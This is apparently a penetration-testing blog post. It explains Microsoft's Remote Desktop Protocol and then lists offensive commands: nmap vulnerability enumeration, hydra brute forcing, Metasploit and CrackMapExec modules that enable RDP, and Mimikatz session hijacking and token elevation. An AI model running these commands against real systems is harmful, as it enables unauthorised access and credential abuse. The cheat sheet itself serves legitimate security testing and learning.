CyberSecurity,  DevSecOps,  Kali Linux,  Network

What is RDP, How to enumerate for privilege escalation.

January 12, 2024 / 0 Comments

RDP stands for Remote Desktop Protocol. It is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user can interact with the remote computer as if they were physically present at its location.

Key features of RDP include:

  1. Remote Control: RDP allows a user to control the desktop of a remote computer. This includes the ability to use the mouse and keyboard to interact with the remote system.
  2. Graphics Rendering: RDP is designed to transmit graphical user interface (GUI) data between the local and remote computers. This enables the remote desktop to display the same visual elements as the local desktop.
  3. File and Resource Sharing: Users can transfer files between the local and remote computers during an RDP session. Additionally, resources such as printers and clipboard content can be shared between the two systems.
  4. Encryption: RDP sessions can be configured to use encryption to secure the data transmitted between the local and remote computers, providing a secure means of communication.

RDP is commonly used for remote administration of computers and for accessing virtual desktops. It is widely used in business environments for IT support, software development, and other tasks that require remote access to computers.

There are different versions of the RDP protocol, and Microsoft regularly updates it to enhance security and add new features. Other remote desktop solutions also exist, but RDP is particularly associated with Microsoft Windows operating systems.

Enumerating RDP

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Post Exploitation

Metasploit

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

CrackMapExec

crackmapexec smb '' -u '' -p '' -M rdp -o ACTION=enable

Connecting to RDP

xfreerdp /v:'' /u:'' /p:''
xfreerdp /v:'' /u:'' /p:'' +clipboard

#Maps specified folder on attacking machine to RDP host
xfreerdp /v:'' /u:'' /p:'' +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share

Persistence

Credential Dumping

RDP Session Hijacking

Invoke-Mimikatz -Command '"ts::sessions"'
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'

Socks5 over RDP

https://github.com/nccgroup/SocksOverRDP

RDP Exploits

Bluekeep

You May Also Like

TCP/IP Model

August 13, 2017

Mac vs IP Addresses

January 29, 2024

SYSLog

September 12, 2017

Leave a Reply

Your email address will not be published. Required fields are marked *